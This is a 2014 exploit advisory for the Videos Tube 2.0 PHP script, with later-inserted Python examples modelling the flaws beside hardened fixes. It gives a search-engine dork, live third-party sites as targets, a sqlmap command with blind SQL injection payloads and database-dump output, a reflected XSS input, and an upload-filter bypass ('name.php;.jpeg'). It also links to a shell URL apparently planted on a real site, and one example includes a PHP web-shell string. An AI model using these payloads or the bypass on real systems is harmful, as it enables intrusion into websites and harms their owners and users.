PACKETSTORM:129128 (packetstormsecurity.com)
Videos Tube 2.0 SQL Injection / XSS / Shell Upload
Author: KnocKout
Published: Nov 17, 2014
Videos Tube <= 2.0 (SQL/XSS/Shell Upload) Multiple Vulnerabilities  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : [email protected]  
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-Warrior.ORG  
[+] Greetz to : http://1337day.com - http://milw00rm.com  
[ASCII-art banner: "h4x0re SEC", Turkey. Team: KnocKout, Septemb0x, BARCOD3, _UnDeRTaKeR_]  
  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Videos Tube  
|~Price : FREE  
|~Version : 2.0 (the latest release at the time of writing)  
|~Software: http://www.phpscriptlerim.com/ucretsiz/videos-tube.html  
|~Multiple Vulnerabilities: SQL Injection & Cross Site Scripting & Shell Upload  
|~Google DORK : "© 2014, Videos Tube. Tüm Hakları Saklıdır." (Turkish: "All rights reserved")  
|[~]Date : 15 Nov. 2014  
|[~]Tested on : Kali Linux  
  
Tested on demos:  
  
http://demo.phpscriptlerim.com/free/videostube/  
http://www.tıger61.com/  
http://www.birkovabuziddiasi.com/  
http://video.egitimledirilis.com/  
  
====================== SQL Injection Vulnerability (POST Method) ===============  
  
Example: http://demo.phpscriptlerim.com/free/videostube/  
  
Target: http://demo.phpscriptlerim.com/free/videostube/search.php  
  
POST data: search=[SQL Injection]&ara=  
  
-------------------------------------------------------------  
POST /free/videostube/search.php HTTP/1.1  
Host: demo.phpscriptlerim.com  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php  
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 16  
search=[Post Method SQL Injection]&ara=  
..  
..  
##############Exploitation (sqlmap console)##########  
sqlmap -u "http://demo.phpscriptlerim.com/free/videostube/search.php" --data="search=&ara=" -p "search" --dbs  
####################################################  
---  
Place: POST  
Parameter: search  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: search=-6400' OR (6785=6785)#&ara=  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind (comment)  
Payload: search=' AND SLEEP(5)#&ara=  
---  
[01:16:58] [INFO] the back-end DBMS is MySQL  
web application technology: PHP 5.4.34  
back-end DBMS: MySQL 5.0.11  
[01:16:58] [INFO] fetching database names  
[01:16:58] [INFO] fetching number of databases  
[01:16:58] [WARNING] reflective value(s) found and filtering out  
[01:16:58] [INFO] resumed: 2  
[01:16:58] [INFO] resumed: information_schema  
[01:16:58] [INFO] resumed: phpscrip_videostube  
available databases [2]:  
[*] information_schema  
[*] phpscrip_videostube  
==============================================================================  
==============================================================================  
==================Cross Site Scripting Vulnerability =========================  
  
Target: http://demo.phpscriptlerim.com/free/videostube/search.php  
POST data: search=[XSS]&ara=  
-------------------------------------------------------------  
POST /free/videostube/search.php HTTP/1.1  
Host: demo.phpscriptlerim.com  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php  
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 16  
search=[XSS]&ara=  
  
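Both findings above come from the same unvalidated `search` parameter of search.php: it is concatenated into the SQL text (the boolean-based blind payloads sqlmap reported) and echoed back into the page unescaped (the reflected XSS). The following is an added example, not code from the Videos Tube script or from the advisory author: a minimal model of such a handler beside its hardened form. It assumes a single `videos` table with constructed sample rows, and uses SQLite in place of MySQL, so the MySQL `#` comment in sqlmap's payloads is swapped for the portable `-- ` comment; the injection logic is otherwise the same.

```python
"""Added example (not the Videos Tube code): a model of a search handler
that pastes the POST 'search' value into its SQL and echoes it unescaped,
next to the hardened version of both.  SQLite stands in for MySQL, so the
advisory's '#' comment is written as '-- ' here."""
import functools
import html
import sqlite3

# Payloads in the shape sqlmap reported (boolean-based blind), with a
# '-- ' comment for SQLite.  TRUE/FALSE differ only in the compared number.
TRUE_PAYLOAD = "-6400' OR (6785=6785)-- "
FALSE_PAYLOAD = "-6400' OR (6785=6786)-- "
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


def make_db():
    """Constructed sample data standing in for the real video table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE videos (id INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)")
    conn.executemany(
        "INSERT INTO videos (title, hidden) VALUES (?, ?)",
        [("Cat video", 0), ("Dog video", 0), ("Unlisted admin clip", 1)],
    )
    return conn


def search_vulnerable(conn, term):
    """Mirrors the bug: the POST 'search' value becomes part of the SQL text.
    With TRUE_PAYLOAD the WHERE clause turns into
    (hidden = 0 AND title LIKE '%-6400') OR (6785=6785) -- ...
    and the comment swallows the rest, so every row comes back."""
    sql = ("SELECT title FROM videos WHERE hidden = 0 "
           f"AND title LIKE '%{term}%' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, term):
    """Hardened: the term is bound as a parameter and can only ever be data."""
    sql = "SELECT title FROM videos WHERE hidden = 0 AND title LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


def boolean_blind_differs(search, true_term, false_term):
    """The differential sqlmap automates: if an injected TRUE condition and
    an injected FALSE condition yield different result sets, the parameter
    is injectable.  'search' is a callable taking the raw term."""
    return search(true_term) != search(false_term)


def render_vulnerable(term, results):
    """Mirrors the reflected XSS: the raw search term is echoed into the page."""
    items = "".join(f"<li>{html.escape(r)}</li>" for r in results)
    return f"<p>Results for: {term}</p><ul>{items}</ul>"


def render_fixed(term, results):
    """Hardened: every untrusted value is HTML-escaped on output."""
    items = "".join(f"<li>{html.escape(r)}</li>" for r in results)
    return f"<p>Results for: {html.escape(term)}</p><ul>{items}</ul>"


if __name__ == "__main__":
    conn = make_db()
    vuln = functools.partial(search_vulnerable, conn)
    fixed = functools.partial(search_fixed, conn)
    print("vulnerable, TRUE payload :", vuln(TRUE_PAYLOAD))   # all rows, hidden one included
    print("vulnerable, FALSE payload:", vuln(FALSE_PAYLOAD))  # nothing
    print("injectable?", boolean_blind_differs(vuln, TRUE_PAYLOAD, FALSE_PAYLOAD))
    print("fixed, TRUE payload      :", fixed(TRUE_PAYLOAD))  # nothing: the payload is a literal
    print("injectable?", boolean_blind_differs(fixed, TRUE_PAYLOAD, FALSE_PAYLOAD))
    print(render_vulnerable(XSS_PAYLOAD, []))
    print(render_fixed(XSS_PAYLOAD, []))
```

The `boolean_blind_differs` check is the manual confirmation worth doing before handing a target to sqlmap: two requests whose only difference is a true versus false condition, compared for a difference in the response. The time-based payload sqlmap also listed (`' AND SLEEP(5)#`) is not modelled because SQLite has no SLEEP(); against the real MySQL backend it confirms the same injection point by response delay rather than by content.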
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
==============================================================================  
==============================================================================  
==========Admin Panel - Shell Upload Vulnerability (bypass with Tamper Data) =======  
INFO:  
  
Prerequisite: access to the admin panel at http://www.TARGET.com/yonetim/ (this is a post-authentication issue).  
  
Then go to  
http://www.TARGET.com/upload/upload.php  
To bypass the extension check, name the shell file "name.php;.jpeg"  
and submit the upload through Tamper Data; a shell uploaded this way was tested successfully (see below).  
  
  
TESTED ON : http://www.birkovabuziddiasi.com/upload/resimler/70ed4c94a1.php  
  
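The advisory records two facts about upload.php: a name of the form "name.php;.jpeg" gets past its filter, and the stored file ends up as a random base name with a .php extension (70ed4c94a1.php). It does not show the script's code, so the weak check below is an assumption about the mechanism: the class of filter that only inspects the text after the last dot, which such a name trivially satisfies. This is an added example, not the Videos Tube code; the hardened routine beside it is what a correct upload handler should do instead.

```python
"""Added example (not the Videos Tube upload.php code): a last-extension-only
filename check, which 'name.php;.jpeg' slips past, beside a hardened
upload-name routine.  The weak check is an assumed mechanism; the advisory
only records that the name bypassed the filter and that the file was
stored as <random>.php."""
import re
import secrets
from typing import Optional

# Allowed image types and the magic bytes each must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Whole-name pattern: one safe base, exactly one dot, one short extension.
NAME_RE = re.compile(r"([A-Za-z0-9_-]{1,64})\.([A-Za-z0-9]{1,5})")


def weak_extension_ok(filename: str) -> bool:
    """Assumed weak check: only the text after the LAST dot is compared with
    the allow-list, so 'name.php;.jpeg' is accepted as a JPEG."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED


def safe_upload_name(filename: str, content: bytes) -> Optional[str]:
    """Hardened replacement.  Returns the name to store under, or None.

    1. The whole client name must match <base>.<ext>: one dot, no ';',
       no spaces, no path separators, so 'name.php;.jpeg' is refused.
    2. The extension is derived once, from that validated match, and must
       be on the allow-list; the same string is used for storage, so the
       check and the stored extension cannot disagree.
    3. The content must start with the magic bytes of the claimed type.
    4. The client name is never reused: the file is stored under a random
       base name with the validated extension.
    """
    m = NAME_RE.fullmatch(filename)
    if m is None:
        return None
    ext = m.group(2).lower()
    magic = ALLOWED.get(ext)
    if magic is None or not content.startswith(magic):
        return None
    return f"{secrets.token_hex(5)}.{ext}"


if __name__ == "__main__":
    JPEG_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 16        # constructed sample content
    PHP_SHELL = b"<?php system($_GET['c']); ?>"              # constructed sample content
    cases = [("cat.jpeg", JPEG_HEADER), ("name.php;.jpeg", JPEG_HEADER),
             ("name.php;.jpeg", PHP_SHELL), ("shell.php", PHP_SHELL),
             ("cat.jpeg", PHP_SHELL)]
    for name, body in cases:
        print(f"{name!r:20} weak_ok={weak_extension_ok(name)!s:5} "
              f"stored_as={safe_upload_name(name, body)}")
```

Even with the name check fixed, the upload directory (resimler/ here) should not be able to execute scripts at all: serve it from outside the document root or configure the web server so no handler runs files placed there. That way a future filter bypass yields a static file, not a shell.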
=============================================================  
  
# milw00rm.com [2014-11-15]  